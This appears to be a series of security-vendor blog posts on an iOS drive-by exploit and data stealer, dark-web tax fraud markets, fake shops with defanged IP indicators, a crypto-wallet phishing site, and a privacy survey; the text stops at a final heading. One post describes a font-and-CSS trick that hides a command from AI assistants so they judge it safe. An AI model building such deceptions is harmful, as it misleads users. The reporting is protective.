The exploit works against iPhones running iOS versions 18.4 through 18.7, and simply visiting a malicious or compromised website with a vulnerable device can be enough to get infected (a drive‑by attack).
The researchers found that several groups are using the tool to attack their preferred targets. DarkSword has been used both by commercial spyware vendors and by state‑backed actors, with campaigns observed in Saudi Arabia, Turkey, Malaysia, and Ukraine.
In Saudi Arabia, attackers used a fake Snapchat lookalike. In Ukraine, attackers compromised at least two Ukrainian websites, including a government site.
Upon successful exploitation, malware is executed on the device. The type of malware depends on the attacker. In the Ukrainian campaign, that malware is known as Ghostblade, one example of a payload delivered via the DarkSword exploit chain.
Ghostblade is a JavaScript‑based data‑stealer that exfiltrates unique device identifiers, SMS and iMessage messages, call history, contacts, Wi‑Fi configuration and passwords, Safari cookies and browsing history, location data, notes, calendar entries, health data, photos, iCloud Drive files, SIM information, emails, a list of installed apps, saved passwords, and the message history from Telegram and WhatsApp.
Beyond this, Ghostblade stands out because it also targets cryptocurrency‑related data, actively seeking apps for major exchanges (Coinbase, Binance, Kraken, Kucoin, OKX, Mexc) and wallet apps (Ledger, Trezor, Metamask, Exodus, Uniswap, Phantom, Gnosis Safe). Researchers note that Ghostblade is not built for long‑term surveillance: once it has collected the data, it deletes its temporary files and terminates itself.
The risks
Vulnerable devices can be infected just by visiting that one malicious or compromised website. And the consequences can be severe. DarkSword turns a single website visit into full device compromise, followed by Ghostblade exfiltrating as much data as it can in one go.
Data theft: Ghostblade and related payloads can grab communications (SMS, iMessage, Telegram, WhatsApp, email), photos, health data, location history, Wi‑Fi credentials, keychain items, and more in one sweep.
Crypto theft and profiling: The malware enumerates specific exchange and wallet apps, which allows both direct theft and lets criminals use the stolen information to build a detailed profile of financially interesting targets.
Forensic evasion: Because Ghostblade wipes its own traces after stealing all that information, it can take a long time before victims figure out something is wrong. Many victims may never know they were compromised.
Since the same exploit kit is being reused across commercial surveillance firms and state‑aligned actors, the number of campaigns and victims will increase over time.
The solutions
Update to the latest iOS available for your device. DarkSword can affect iOS versions 18.4 through 18.7, and Apple’s recent releases include fixes for CVE‑2026‑20700 and related vulnerabilities.
If you have reason to believe you’re a potential target for attacks of this nature (journalists, activists, or people that have access to sensitive data) it is advisable to enable Lockdown Mode:
Open the Settings app.
Tap Privacy & Security.
Scroll down, tap Lockdown Mode, then tap Turn On Lockdown Mode.
Read the presented information and tap Turn On Lockdown Mode.
Tap Turn On & Restart.
Enter your device passcode when prompted.
Do inform yourself about the consequences of turning on Lockdown Mode. It makes your device a lot less user-friendly, but it has proven effective against highly targeted attacks.
Here are some more general tips:
Use up-to-date, real-time anti-malware protection for your device to block malicious websites where possible.
Avoid following links sent in unsolicited messages, especially for services like Snapchat, crypto exchanges, banking, or email.
Use content blockers (for example Malwarebytes Browser Guard) in Safari to reduce exposure to malicious content (though they are not a silver bullet for zero‑days).
Move high‑value crypto assets to hardware wallets or dedicated devices, and use mobile wallets only for smaller amounts.
Use a password manager with strong authentication, and turn on extra security settings like Face ID/Touch ID and avoid auto‑filling high‑risk credentials.
Enable multi-factor authentication (FIDO2 security keys or app‑based 2FA) on exchanges and financial accounts, so stolen passwords alone are not enough to plunder your accounts.
Regularly review app permissions and revoke access to sensitive data (Location, Photos, Contacts, Microphone, Camera, Health) revoke where unnecessary.
We don’t just report on phone security—we provide it
Tax season is also peak season for identity theft. Criminals use stolen personal data to file fake tax returns and claim refunds before the real taxpayer does. Here’s how the fraud works, and how to protect yourself.
What is Stolen Identity Refund Fraud (SIRF)?
Stolen Identity Refund Fraud (SIRF) is a type of tax fraud where criminals steal someone’s personal information—such as a Social Security number and date of birth—and use it to file a fake tax return in that person’s name in order to claim a tax refund.
The fraudsters usually submit the false return early in the tax season before the real taxpayer files, so the refund is issued to them instead of the legitimate person.
The money is often sent to bank accounts, debit cards, or addresses controlled by the criminals. Victims usually discover the fraud only when their real tax return is rejected or when the tax authority, like the US Internal Revenue Service (IRS), reports that a refund has already been issued in their name.
How is it even possible?
As Americans scramble to meet the annual tax filing deadline, a hidden ecosystem on the Dark Web kicks into overdrive, transforming tax season into a lucrative period of the year for international cybercriminals. Shahak Shalev, Global Head of Scam and AI Research at Malwarebytes, said:
“People are expecting messages about taxes, refunds, and filings, which makes phishing emails and fake IRS alerts much easier to believe. At the same time, the personal data needed to commit tax fraud is shockingly cheap on the dark web. It’s no surprise scammers treat tax season like an annual opportunity.”
Behind the sudden influx of fraudulent refund claims lies a highly organized criminal supply chain deeply rooted in Russian-language underground forums. These specialized platforms act as the primary enablers of tax fraud.
Rather than harvesting data from scratch, fraudsters can simply purchase massive datasets of stolen Personally Identifiable Information (PII), complete with ready-to-use W-2 and 1040 forms. For more sophisticated operations, Initial Access Brokers (IABs) auction off direct network access to compromised Certified Public Accountants (CPAs) and accounting firms.
Beyond raw data and access, this underground economy provides a full suite of “fraud-as-a-service” tools—including on-demand services to forge supporting financial documents and dedicated instructional hubs featuring step-by-step tutorials.
A threat actor looking for partners for US tax refund fraud (based on data from accounting software)
The threat actor is selling access to a CPA company with accounting software databases
A threat actor looking for partners for US tax refund fraud
The black market of PII
At the epicenter of this illicit commerce is one of the premier Russian-language underground forums, which serves as the definitive marketplace for fraudsters to buy and offload tax-related PII. The commoditization of this data is staggering in its efficiency, operating much like a traditional e-commerce platform.
Our research team has captured several compelling samples of this trading activity, highlighting a clear pricing tier based on the freshness of the data and the target demographic. In one recently observed listing, a threat actor advertised a bulk package of 100 complete tax forms for $2,000—effectively pricing a fully documented stolen identity at just $20.
A threat actor offering US tax forms and W-2s for sale
A threat actor offering discounted 1040 forms, PII, and bank data for sale
Conversely, older data dumps from the 2024 tax year are heavily discounted to clear inventory; highly sensitive records specifically belonging to wealthy retirees and pensioners from that period are currently being traded for less than $4 per identity.
Access for sale
This staggering volume of tax-related data must originate from somewhere, and threat actors have identified the ultimate jackpot: US companies that handle tax preparation and accounting procedures.
From an attacker’s perspective, it is infinitely more efficient to breach a dedicated business that serves as a centralized vault for this sensitive information than to cast a wide net trying to trick individual citizens into handing over their personal details.
Our research team recently intercepted a prime example of this strategy in action, identifying a Dark Web listing for compromised network access to a US-based tax service firm. The victimized organization is a small business; a typical target of criminals looking for easy access for exploitable information.
Exploiting these systemic weaknesses, the threat actor was able to quietly infiltrate the company’s internal infrastructure and is now auctioning off direct access to a database containing the complete, highly sensitive PII of over 1,600 clients.
A threat actor auctioning off access to a database of PII of more than 1,600 customers
Additional data for sale
Even when threat actors encounter roadblocks during the fraud process—such as a missing piece of PII or a highly specific financial document required for verification—the cybercrime underground offers a comprehensive suite of on-demand services to seamlessly solve these issues.
Our research team has tracked a dedicated black market known as “Cypher – Fullz and Docs,” which specializes in selling complete, ready-to-use sets of stolen US identities (commonly referred to in the underground as “fullz”) for as little as $0.75 per set.
Advertising stolen data on the dark web
Another ad for “fullz” – full identities
However, having the basic data is sometimes not enough to bypass required checks.
When additional paperwork is required to legitimize a fraudulent claim, threat actors simply turn to specialized forgery services like “Fakelab.” For a nominal fee ranging between $20 and $40, Fakelab operates as an illicit digital design studio, meticulously forging any tax-related document an attacker might need, from customized W-2s to realistic bank statement, ensuring the scam can proceed without a hitch.
Advert for documents, including medical and tax forms
Price list for data
Tutorials and guidance
The culmination of the tax fraud lifecycle—and often the most precarious phase for the attacker—is the cashout. To successfully finalize the scam and extract the stolen funds, fraudsters require a robust financial infrastructure, typically relying on compromised “drop” bank accounts and supplementary financial tools designed to launder the money and obscure their tracks.
Unsurprisingly, the Dark Web ecosystem provides not just the tools but the detailed education necessary to execute this critical phase. Our research team identified a dedicated underground resource known as “Flava,” which serves as a centralized instructional hub. This platform is brimming with comprehensive, step-by-step tutorials specifically detailing how to orchestrate these complex cashout schemes targeting US citizens and residents.
A Russian-language marketplace related to financial fraud techniques.
How to stay safe
Stolen Identity Refund Fraud is a reminder that identity theft doesn’t just lead fraudulent purchases. It can impact something as fundamental as filing your taxes.
Cybercriminals take advantage of underground marketplaces that sell stolen personal data, compromised business access, and tools designed to support fraud. It makes it easier for criminals to file fake tax returns quickly and at scale.
For taxpayers, the best defense is limiting the amount of personal data available to criminals, filing your taxes early, and paying attention to any warning signs that someone may be trying to use your identity.
Tax fraud often depends on criminals getting access to your personal information first. The less data they have, the harder it is for them to impersonate you. Here are some steps that can help reduce your risk:
File your taxes early. Submitting your legitimate tax return early makes it much harder for criminals to file one in your name first.
Protect your Social Security number. Avoid sharing your Social Security number unless it’s absolutely necessary.
Watch out for phishing emails and texts. Scammers often pose as the IRS, banks, or tax services to trick people into revealing personal data.
Use strong, unique passwords. If criminals gain access to your email or financial accounts, they may be able to collect the information needed to impersonate you.
Monitor your accounts and credit reports. Unexpected tax notices, rejected returns, or unfamiliar financial activity can all be warning signs of identity theft.
Consider an IRS Identity Protection PIN (IP PIN). An IP PIN adds an extra verification step when filing your tax return, helping prevent criminals from filing in your name.
Note: These dark web screenshots have been roughly translated from Russian.
What do cybercriminals know about you?
Use Malwarebytes’ free Digital Footprint scan to see whether your personal information has been exposed online.
Researchers have published a proof-of-concept (PoC) that uses custom fonts to fool many popular Artificial Intelligence (AI) assistants, including ChatGPT, Claude, Copilot, Gemini, Leo, Grok, Perplexity, Sigma, Dia, Fellou, and Genspark.
Imagine a book where the visible text is harmless, but hidden between the lines is a second message written in special, human-only ink. Humans can see both layers. AI can’t, and it only reads the visible part. That means the AI is working with an incomplete picture, while a human reader may act on instructions the AI never even saw.
Why this matters
We’ve written before about different ClickFix-type attacks, where cybercriminals trick people into infecting their own devices. Suppose you land on a suspicious-looking webpage and ask your AI assistant, “Is this command safe to run?” The assistant checks the page and says yes. But as it can’t read the whole page, it tells you it’s safe when it’s not.
By combining custom fonts with Cascading Style Sheets (CSS), the text shown to the user on the page is different from what an AI assistant sees when it reads the underlying HTML.
Image courtesy of LayerX
In this example, the part in the block in the middle (outlined in red) will be discarded by the AI assistant as noise. But the human website visitor sees:
it will allow you to see your easter egg from Rapture
Depending on the IP address and port number, this can be enough for you to infect your machine. If you ask the AI whether it’s safe, it may say yes, because it only sees the harmless version.
The researchers have disclosed their findings to the major AI platform providers, under Responsible Disclosure procedures.
The responses were disappointing:
“Most providers rejected the report, usually under the claim that this attack falls outside of the scope of AI model security. As a result, users of these models remain exposed to this attack vector.
The only vendors that accepted this report and asked for time to fix it were Microsoft and Google. Of those, Google ultimately de-escalated (after initially assigning it a P2 (High) score), and closed the report, possibly because fixing it would require too much effort.”
While this attack relies heavily on social engineering, we know just how effective those tactics can be. And it’s even more concerning when your AI assistant can’t see the full picture.
How to stay safe
If you use an AI assistant to check whether something is safe:
Copy and paste the exact command you plan to run. Don’t rely on the AI’s interpretation of a webpage.
Be cautious with any site asking you to run commands, especially via terminal or command prompt.
If something feels off, stop. Attackers rely on urgency and confusion.
Tools can help too:
The free Malwarebytes Browser Guard extension will warn you if a website tries to copy something to your clipboard and render it harmless by adding some text. This will help protect you from traditional ClickFix-type attacks that rely on executing a command from your clipboard.
If you don’t trust a website, ask Malwarebytes Scam Guard for its opinion. It’s very good at sniffing out scams.
We don’t just report on scams—we help detect them
Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard. Submit a screenshot, paste suspicious content, or share a link, text or phone number, and we’ll tell you if it’s a scam or legit. Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.
Apple has released a Background Security Improvement to patch a flaw that could allow malicious websites to bypass browser protections and access data from other sites.
What is it?
The patched WebKit vulnerability is described as:
“A cross-origin issue in the Navigation API was addressed with improved input validation.”
WebKit vulnerabilities refer to security flaws in Apple’s web rendering engine, which powers Safari, Mail, and the App Store on iOS and macOS.
What this means is that the CVE-2026-20643 vulnerability makes it possible for a malicious website to pretend to be another site, maybe one you trust, and then read or steal information that should be kept separate. Normally, browsers enforce a rule called the “same‑origin policy,” which is like a strict fence that stops one site from peeking into another site’s data. This bug could help cybercriminals cut through that fence.
In practical terms, an attacker would first have to lure you to a specially crafted web page. If you visited it, that page could try to bypass the normal isolation between sites and access things it should not see, such as data from another tab or embedded content from a different service.
Attackers do not currently appear to exploit this flaw in the wild, but they like to chain issues like this with other bugs to steal accounts or sensitive data, which likely prompted Apple to ship it as a Background Security Improvement. Apple’s fix tightens how WebKit checks and handles cross‑site navigation.
What to do
This patch for a WebKit vulnerability, tracked as CVE-2026-20643, installs on top of versions 26.3.1/26.3.2 and not as a separate full OS version. Background Security Improvements are only available on the latest OS branch (26.x) and apply silently in the background if you’re on the latest version.
For iOS and iPadOS users, you can check if you’re using the latest software version by going to Settings > General > Software Update. It’s also worth turning on Automatic Updates if you haven’t already. You can do that on the same screen.
For macOS Tahoe users, you can find out if you’re on the latest 26.3 version from the Apple menu. In the upper-left corner of your screen, choose About This Mac. The information shown there includes the macOS name and version number. If you need to know the build number as well, click the version number to see it.
This Background Security Improvement is only available for Mac users running Tahoe 26.3.1 and MacBook Neo users running 26.3.2.
All users have to do is to check if they have the Background Security Improvements option set to enabled.
For iPhone and iPad users, this setting can be found under Privacy & Security, where you can scroll down and look for the Background Security Improvements toggle.
Automatically install security improvements
On a Mac (macOS Tahoe 26.3.+ only), you can check by following these instructions:
Click the Apple menu > System Settings.
In the sidebar, click Privacy& Security.
Scroll down on the right and click Background Security Improvements.
Make sure Automatically Install is turned on. If it’s off, the Mac won’t get Background Security Improvements until the fixes are rolled into a later full update.
The Install option in my screenshot means that you can speed up the process by clicking it. But it’s fine to wait until it happens automatically.
After the update, your OS version should show 26.3.1 (a), except for MacBook Neos which should be at 26.3.2 (a).
We don’t just report on phone security—we provide it
We mapped a sprawling fake shop operation of over 20,000 domains, dozens of shared IP addresses and identical storefronts with different names pasted on top. They exist for one purpose: to steal your payment details and personal data. The thread that ties them all together is a browser tab title most people would never think twice about: “Unrivaled selection only for you.”
Polished storefronts, empty warehouses
Fake shops are fraudulent websites designed to look and feel like legitimate online retailers. They have product listings, brand logos, customer reviews, shopping carts, and functional-looking checkout pages. They just never deliver what they promise. In some cases, victims receive nothing at all. In others, they get a cheap knockoff worth a fraction of the advertised price.
Either way, the product being sold is your data: these fake shops harvest your payment credentials, billing addresses, and personal details and then resell them on criminal marketplaces or use them directly for identity fraud.
The scale of the problem has exploded. According to recent threat intelligence data, fake e-shop scams rose by 790% in the first quarter of 2025 compared to the same period the year before, driven in part by economic anxiety around trade tariffs pushing consumers toward bargain alternatives.
During the 2024 holiday season alone, researchers identified over 80,000 fake stores, many of which disappeared or rebranded within days. Industry telemetry from late 2025 found that fake shops accounted for 65% of all threats blocked on social media, with Facebook and YouTube as the primary launchpads.
These operations are increasingly industrialized. Researchers recently documented FraudWear, a coordinated campaign involving over 30,000 fraudulent stores impersonating more than 350 fashion brands worldwide.
Another investigation uncovered BogusBazaar, a franchise-style network where a core team maintained the servers, payment processing, and template infrastructure, while decentralized operators spun up individual shops on top of it. That network processed over a million orders across 75,000 domains since 2021.
Fake shops succeed because they use familiar shopping behavior: clicking on ads, following search results, and landing on polished-looking sites. They layer psychological pressure on top, with limited-time offers, countdown timers, and disappearing stock warnings.
Same storefront, different names
While investigating suspicious e-commerce domains, we identified a cluster of more than 20,000 sites sharing common infrastructure patterns.
Most used the .shop top-level domain (TLD), which has become a favourite among scammers thanks to cheap registration fees and a plausible-looking name. The .shop extension now ranks among the top TLDs associated with spam and malicious activity, according to Cloudflare’s email security data.
Digging into the page source revealed what ties these sites together. All run on WordPress and are powered by Sellvia, a legitimate US-based e-commerce platform that allows users to launch a dropshipping store quickly with ready-made templates, product catalogs, and payment processing.
The storefronts reuse Sellvia’s themes and pull product images from its network. The six “different” templates we observed are really just two base themes with cosmetic variations. Here are some examples, shown in pairs to illustrate how the same template appears under completely different brand names.
20,000 domains, 36 IP addresses
Behind the visual similarities, these fake shops share a common infrastructure backbone. All 20,000+ domains resolve to a set of just 36 IP addresses.
That level of concentration isn’t typical for legitimate online retailers. It’s a hallmark of bulk fraud operations where one group manages the servers and templates while individual operators spin up domains on top.
Much of this activity clusters around a small number of IP ranges, including blocks in the 207.244.x.x and 23.105.x.x space. That clustering points to a preference for specific hosting providers, and a setup designed for speed: spin up a domain, attach a template, go live.
This mirrors the franchise-style model seen in other fake shop networks. A core group manages the servers, templates, and payment setup, while operators register domains and launch storefronts on top. When one site is flagged or taken down, another takes its place.
But the same clustering is also a weakness. Disrupt a small number of servers, and you can take thousands of sites offline.
How to stay safe from fake shops
These fake shops aren’t independent businesses. They’re part of large, repeatable operations designed to look convincing, move fast, and disappear just as quickly.
If a site feels unfamiliar, rushed, or too good to be true, treat it that way. A few extra seconds of checking can save you from handing over your money and your data to cybercriminals.
Use browser protection. Tools like Malwarebytes Browser Guard can block known scam sites before you ever reach checkout.
Check the domain carefully. Be cautious with unfamiliar endings like .shop, .top, .store, and .xyz, especially when paired with generic, brand-sounding names. If you’ve never heard of the retailer, that’s your first signal.
Be skeptical of deep discounts. If an item is sold out everywhere else but heavily discounted on one unknown site, it’s bait.
Watch for copy-paste storefronts. If multiple sites have identical layouts, product images, and banners under different names, they’re likely using the same template. Legitimate stores don’t operate like that.
Look for independent reviews. Search the store name with terms like “review” or “scam.” If the only results are the site itself, that tells you something.
Don’t ignore your instincts. If something feels off, stop. Don’t enter your payment details just to “see what happens.”
Use safer payment methods. Credit cards offer better protection than debit. Virtual cards or payment services can add an extra layer between your details and the seller.
Pro tip: Malwarebytes blocks these domains as fraudulent.
Indicators of Compromise (IOCs)
IP addresses
108[.]59[.]1[.]151
108[.]59[.]12[.]118
108[.]59[.]14[.]13
108[.]59[.]8[.]97
108[.]62[.]0[.]220
108[.]62[.]116[.]82
108[.]62[.]117[.]45
162[.]210[.]195[.]105
162[.]210[.]195[.]113
162[.]210[.]198[.]37
162[.]210[.]199[.]12
162[.]210[.]199[.]183
162[.]210[.]199[.]235
192[.]96[.]200[.]81
198[.]7[.]58[.]168
198[.]7[.]58[.]87
199[.]115[.]115[.]2
207[.]244[.]102[.]13
207[.]244[.]109[.]109
207[.]244[.]126[.]106
207[.]244[.]126[.]19
207[.]244[.]126[.]21
207[.]244[.]67[.]158
207[.]244[.]69[.]201
207[.]244[.]71[.]143
207[.]244[.]89[.]198
207[.]244[.]91[.]203
23[.]105[.]160[.]43
23[.]105[.]172[.]14
23[.]105[.]8[.]15
23[.]105[.]8[.]17
23[.]105[.]8[.]19
23[.]82[.]11[.]26
23[.]82[.]13[.]161
23[.]82[.]13[.]34
5[.]79[.]69[.]45
We don’t just report on scams—we help detect them
Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard. Submit a screenshot, paste suspicious content, or share a link, text or phone number, and we’ll tell you if it’s a scam or legit. Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.
A phishing site impersonating the newly-launched Pudgy World browser game is targeting crypto users with a technique that goes well beyond a convincing logo and matching color scheme.
Pudgy World is a free-to-play browser game built around the Pudgy Penguins NFT brand. Players explore a virtual world, customize penguin avatars, and complete quests. But some features are tied to digital collectibles and in-game items stored in cryptocurrency wallets.
That means the official game sometimes asks players to connect a crypto wallet to verify ownership of items or unlock additional features. The phishing site abuses that step: When a visitor selects their wallet on this fake site, it shows what appears to be that wallet’s own unlock screen. To the user, it looks for all the world like the real crypto wallet software they already trust.
Phishing site impersonating the Pudgy World site.
“Connect your wallet to get started”
The Pudgy Penguins brand has had an extraordinary few months. The penguin NFT project, revived by CEO Luca Netz after he acquired it in 2022, has steadily built one of the most convincing crossover stories in Web3: physical plush toys on Walmart and Target shelves, a mobile game called Pudgy Party that crossed a million downloads, and a browser-based game called Pudgy World that went live on 10 March 2026 to immediate viral attention.
The official game asks players to connect a crypto wallet to get started. That text: “Connect your wallet to get started” is now appearing, verbatim, on a site that has nothing to do with Pudgy Penguins.
The domain in question is pudgypengu-gamegifts[.]live. It is not affiliated with Igloo Inc., the company behind Pudgy Penguins, in any way. The site reproduces the official game’s icy background artwork, the Pudgy Penguins logo, and the brand’s characteristic blue-and-white color palette with enough fidelity that a user arriving during the excitement of a new game launch would have no obvious reason for suspicion.
Eleven wallets, eleven convincing forgeries
Selecting a wallet here triggers the fake wallet interface.
Clicking the CONNECT button opens a dark-themed pop-up window built to resemble the Reown WalletConnect connection kit—the open-source library that the real Pudgy World site uses to handle wallet connections. The modal even displays the “reown” and “Manual Kit” tab labels at the top, matching the genuine component.
The attack becomes technically interesting at the next step.
Selecting a software wallet does not redirect the user to another page or open an external site. Instead, the page renders an overlay designed to look like the wallet’s actual browser extension unlock screen. The overlay appears at the edge of the browser viewport right where a real extension popup would appear.
Hardware wallet flows behave differently. Selecting Trezor Wallet opens a center-screen dialog mimicking the Trezor Connect interface, rather than a corner overlay. In both cases, the result is that the user believes they are looking at their own installed software, when they are in fact looking at a webpage element controlled by the attacker.
The forgery sits exactly where your real extension would
For every browser extension wallet on the list, the phishing site renders an unlock screen built to match the real extension’s own visual identity, with the correct logo, color scheme, button layout, and wording.
The screenshots below show the forgeries alongside the genuine extensions. The differences are not visible to someone who is not looking for them.
Fake extension
Real extension
Fake extension
Real extension
Fake extension
Real extension
Hardware wallet users are not exempt, and the targeting of Trezor is particularly telling.
Trezor devices are typically owned by people who have been in crypto long enough to invest in dedicated security hardware. In other words, users likely holding higher-value accounts.
Selecting Trezor Wallet on the phishing site triggers a dialog that closely mimics the Trezor Connect bridge interface. At the same time, the browser displays a native USB device permission prompt—the operating system’s own dialog, triggered by a WebUSB API call—reading “pudgypengu-gamegifts.live wants to connect.”
The prompt says “No compatible devices found” if no Trezor is plugged in, but the sequence is designed to look like a genuine hardware handshake.
A user who plugs in their Trezor at this point and approves the USB permission has granted the phishing site access to the device bridge.
For those without a device to hand, the dialog offers another option: “Use an alternative connection method.” That path is likely where the most damage is done. A user who cannot get the hardware flow to work and falls back to a manual option is one step away from being asked to type in their seed phrase, the master key to everything in their wallet, directly into a field the attacker controls.
“No compatible devices found.”
The page that plays dead for researchers
The phishing page is more cautious than it first appears.
Embedded in the site is an obfuscated JavaScript loader, its real contents compressed and hidden behind multiple layers of encoding, that performs a series of checks before doing anything visible.
First, it tests whether the browser is being driven by an automated tool of the kind security researchers and sandboxes use to analyse suspicious pages in bulk. If it detects one, it quietly stops and the page appears clean.
Next, it reads the graphics hardware identifier to determine whether it is running inside a virtual machine, which is another common analysis environment.
Only once it is satisfied that a real user is present does it request a second, larger payload from the attacker’s server. That payload contains the code responsible for credential theft.
Even that request contains a safeguard. If the server response is smaller than 500 KB (the kind of placeholder response a security vendor might serve to a known malicious domain), the loader discards it and does nothing.
The practical consequence of all this is that automated scanning tools are likely to rate the initial page as benign, because on their infrastructure, it behaves like one. The malicious functionality never loads unless the attacker’s server decides the visitor is worth targeting.
Why this campaign targets Pudgy players
The timing seems to be deliberate. Pudgy World launched on March 10, 2026, and the phishing campaign appears to have been active around the same window. New players arriving at the game for the first time are walking through a Web3 onboarding flow they have never experienced before.
The legitimate “connect your wallet” step on the official site teaches users that this behaviour is normal. The phishing site then exploits that expectation before experience can challenge it.
The range of wallets targeted is also significant. The campaign leaves almost no wallet blind spot. Whether the victim holds Ethereum, Solana, or multi-chain assets, there is a convincing forgery waiting for them. Building 11 wallet-specific UI forgeries is not a trivial undertaking. It points either to a well-resourced threat actor or, more likely, to the reuse of a commercial phishing kit built for precisely this class of attack.
What to do if you may have been affected
Crypto phishing campaigns have long relied on fake airdrops and fake MetaMask pages. This campaign stands out for how precisely it imitates a wallet’s unlock screen, placing the prompt exactly where a real extension pop-up would appear and exploiting users’ muscle memory.
The attack also piggybacks on Pudgy World’s launch. As Web3 products reach wider audiences, they attract attackers targeting users unfamiliar with wallet security.
One rule still holds: a website can never display your real browser extension unlock screen.
If you entered your MetaMask, Coinbase Wallet, or any other software wallet password on this site, change your password immediately by unlocking the extension normally and going to Settings. Consider transferring assets to a new wallet address whose seed phrase has never been used on any website.
If you approved the USB device permission prompt for Trezor, disconnect your device and review your Trezor Suite connection history. A WebUSB connection alone does not expose your seed phrase, but it can allow a malicious page to communicate with the bridge. Revoke the permission in your browser’s site settings immediately.
Bookmark the official Pudgy Penguins site (pudgypenguins.com) and the official game URL. Navigate to it directly from that bookmark, never from a link in Discord, Twitter, or a direct message.
Install a browser extension that flags known phishing domains before you interact with them. Malwarebytes Browser Guard will block this domain.
Remind yourself of this rule: your wallet’s unlock screen always appears in the bar at the very top of the window, not inside the page itself. Any page that appears to show you your wallet’s password prompt inside the page content is a phishing site.
AI didn’t sneak into our lives. It burst through the door, took a seat at the table, and started finishing our sentences.
Instead of a helpful list of links, Google now tries to answer your question. Microsoft’s Copilot drafts replies to your boss before you’ve had coffee. Your phone summarizes conversations you don’t even remember having.
Every major tech company is racing to add AI to its products because no one wants to be left behind. And the public is often forced to accommodate such corporate whims because of the increasing effects of “enshittification,” as explained by Cory Doctorow on the Lock and Code podcast.
People are using AI. But they don’t trust it.
In our latest privacy pulse survey, in which we gathered 1,200 responses from readers of the Malwarebytes newsletter earlier this year, 90% of respondents said they’re worried about AI using their data without consent.
Ninety per cent.
That’s not a few skeptics. That’s nearly everyone we asked. We admit, our sample is probably skewed towards the privacy conscious. But 90% of people who follow Malwarebytes are worried about how much personal data AI is slurping up, and what it’s going to do with it, so that’s a good barometer for how much everyone should care.
That concern is changing the way people are using the internet:
88% do not “freely share personal information with AI tools like ChatGPT and Gemini”
84% have not “shared personal health information with AI tools”
But people have been concerned about holding onto their personal information for a long time.
From the survey:
92% are concerned about their “personal data being used inappropriately by corporations,” which is up slightly from last year (89% in 2025)
74% are concerned about their “personal data being accessed and used inappropriately by the government” (up from 72%)
Years of data breaches, shady tracking practices, and dangerous misuse by data brokers have chipped away at our confidence in organizations to protect our data. Over the past year, healthcare organizations have continued to report major security lapses affecting sensitive patient data. The FTC warned about “staggering” commercial surveillance practices that most consumers never agreed to, and, according to our survey, 49% of people reported that their personal info has been used in scams that target them or their family.
Is AI really any different to, say, social media?
When people use social media, they generally understand their clicks and likes are being tracked. When they shop online, they expect the shop to store their purchase histories or track the items they were interested in. They understand the concept of advertising and see how it slots into social or commercial websites.
AI tools are different because we use them differently.
When we share ideas, client meeting notes, personal dilemmas, and health questions with an AI assistant, we are treating them as a confidant. Maybe we’ve paid for an access level that promises not to train its models on our data. Even when we’re chatting about flat-packs and missing screws with a site’s AI chatbot, we behave as if we’re talking to another person, and not broadcasting that conversation to the world.
The interaction with AI feels intimate and conversational, even though we’re all aware we’re talking with a bot. That makes the uncertainty around how that AI handles the data we’ve fed it more personal, more immediate.
We know that AI assistants from a company are often plugged into other tools. We know GPTs can be created by any developer or scammer. (Check out Malwarebytes in ChatGPT—we’re one of the good guys). We know nearly every business or personal platform now has some form of AI-based data-gathering element. What the average person doesn’t know about AI feels scary.
Where are our prompts stored?
Are those prompts are used to train the AI?
How long are they kept?
Can anyone inside the company read them?
Can they be bought? Used for advertising? Leaked?…
Yes, companies publish policies, but who in the real and busy world reads all those before we use the tool? Fewer than half, but a growing number, with 48% said they now read privacy policies and reports—up from 43% in 2025.
Besides, we know from recent headlines that companies are rushing out AI features before they’ve had time to properly security-check them.
A glimmer of hope: People are taking action
This result from the survey caught our eye.
63% of respondents agreed with the statement: “I feel resigned that my personal data is already out there, and I can’t get it back.”
Last year, that number was 74%.
So, while concern about data misuse is still high, fewer people feel entirely helpless.
Respondents reported taking practical steps to limit their data exposure.
Some have reduced or stopped their use of certain platforms entirely because of privacy concerns, including social media (44% have stopped using Instagram, 37% have stopped using Facebook, and 49% have stopped using Tiktok) and AI tools (43% have stopped using ChatGPT, 42% have stopped using Gemini).
Others reported sharing less personal information online or avoiding sensitive topics in digital conversations (88% said they do not freely share personal information with AI tools).
There is also increased use of privacy-protective tools for their data, devices, and identities.
46% use a VPN (up from 42% in 2025)
40% have an identity theft protection solution (down from 43%)
25% use a personal data removal service or solution (up from 23%)
71% use an ad blocker for online browsing (up from 69%)
48% read privacy policies and reports (up from 43%)
76% use MFA (up from 69%)
82% opt-out of data collection, as possible (up from 75%)
38% use fake/dummy data online whenever possible (up from 33%)
None of these actions erase historical data trails, but they do limit new exposure. David Ruiz, senior privacy advocate at Malwarebytes, said:
“Twenty years of online innovation have pointed too many companies in the same direction—against everyday people.
For most people today, the corporations that are pressing AI tools into their daily lives are the same corporations that have monetized their attention spans, invaded their privacy, and lost their data to breaches. But a counterforce is emerging.
The small changes in user behavior should encourage others to understand that, even now, privacy remains possible and worthwhile.”
Privacy protection can feel binary: either everything is exposed or everything is secure. But it’s incremental, and the survey responses reflect how people are starting to take back control of their data.
What this means for companies
Organizations adding AI into their products face a more complex audience than they might have first assumed.
For years, product teams have assumed users would trade more data for more convenience. But when nearly nine in ten people said they’re concerned about AI using their data without consent, trust becomes part of the product itself. Mozilla jumped on this and added a simple “turn off AI” button to Firefox.
It’s no longer enough to highlight what AI can do. Users want to understand what happens after they press “submit.”
We the People… want strong privacy laws
When concern reaches the sort of level we’ve seen in our survey, it inevitably raises the thorny question of regulation.
91% of respondents said they “support national laws regulating how companies can collect, store, share, or use our personal data.”
The issue is less about one tool and more about a sense that the guardrails are unclear. Generative AI systems can draft legal documents, write emails, and process sensitive data at speed. Much of the existing privacy frameworks in the US, EU, and other regions were written before AI was commonplace.
Regulators are trying to catch up. The European Union’s AI Act, passed in 2024, introduced a risk-based approach to governing certain AI systems. In the US, federal agencies including the FTC have issued guidance and warnings around commercial surveillance and automated decision-making, but it does not yet have a comprehensive AI-specific privacy statute.
Desire for national laws and regulation is at an all-time high. Consumers want boundaries that are understandable and enforceable.
What you can do
